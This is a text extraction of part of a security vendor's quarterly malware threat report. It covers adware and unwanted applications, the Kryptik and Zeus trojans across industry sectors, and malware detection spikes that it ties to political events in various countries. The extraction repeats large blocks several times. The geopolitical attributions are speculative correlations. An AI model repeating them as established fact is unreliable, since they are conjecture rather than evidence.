Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
